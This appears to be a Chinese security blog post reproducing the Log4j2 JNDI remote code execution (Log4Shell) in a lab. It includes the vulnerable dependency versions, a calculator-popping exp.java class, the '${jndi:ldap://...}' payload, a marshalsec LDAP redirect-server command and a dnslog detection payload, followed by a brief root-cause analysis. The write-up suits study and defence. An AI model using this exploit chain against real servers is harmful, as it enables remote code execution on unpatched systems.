Log4j-2命令执行复现和

0x00 漏洞描述

Apache Log4j2是一个基于Java的日志记录框架。正常情况下，开发者可能会将错误信息写入日志中，可以利用此特点构造特殊的数据请求包，最终触发远程代码执行RCE漏洞。Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。

0x01 受影响版本

log4j2 2.0 - log4j2 2.15.0-rc1

0x02 漏洞复现

新建maven工程，pom.xml中引入log4j2依赖：

1.  
   <dependency>
2.  
   <groupId>org.apache.logging.log4j</groupId>
3.  
   <artifactId>log4j-core</artifactId>
4.  
   <version>2.14.1</version>
5.  
   </dependency>
6.  
   <dependency>
7.  
   <groupId>org.apache.logging.log4j</groupId>
8.  
   <artifactId>log4j-api</artifactId>
9.  
   <version>2.14.1</version>
10.  
    </dependency>

exp.java

1.  
   public class exp {
2.  
   static{
3.  
   try {
4.  
   Runtime rt = Runtime.getRuntime();
5.  
   String[] commands = {"gnome-calculator" };
6.  
   Process pc = rt.exec(commands);
7.  
   pc.waitFor();
8.  
   } catch (Exception e) {
9.  
   e.printStackTrace();
10.  
    }
11.  
    }
12.  
    }

该exp用于弹出计算器，验证命令执行效果。

test.java

1.  
   import org.apache.logging.log4j.LogManager;
2.  
   import org.apache.logging.log4j.Logger;
3.  
    
4.  
    
5.  
   public class test {
6.  
   public static final Logger logger = LogManager.getLogger(test.class);
7.  
    
8.  
    
9.  
   public static void main(String[] args){
10.  
    logger.error("${jndi:ldap://192.168.65.233:9999/exp}");
11.  
    }
12.  
    }

手动将exp.java生成字节码文件，并通过python搭建简易web用于外部访问：

再开一个恶意的ldap服务：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.65.233:9001/#exp" 9999

运行test.java,可以看到ldap服务和web服务都有访问记录：

并且有计算器弹出来，命令执行成功：

${jndi:ldap://qh48j1.dnslog.cn:9999/exp}这个payload高版本的java也会进行域名解析，可以看到dns请求记录：

但是只有低版本的java才能执行命令。java版本在6u211、7u201、8u191及java11等更高版本的java中默认不能使用RMI或LDAP进行JNDI注入，因此较为安全。

0x03 漏洞分析

这次漏洞主要原因是log4j2提供的Lookup的功能，对于要输出的日志，提供了很多种查找的途径，JNDI只是其中一种。JDNI支持命名引用的方式，通过远程下载class文件来构建对象，最终造成命令执行。

这是目前JNDI Lookup方式的介绍：

其中增加了对来源class的限制。

0x04 最后

10号一早看到POC，拖到现在才发确实有些不好意思。

长按下方图片关注我们：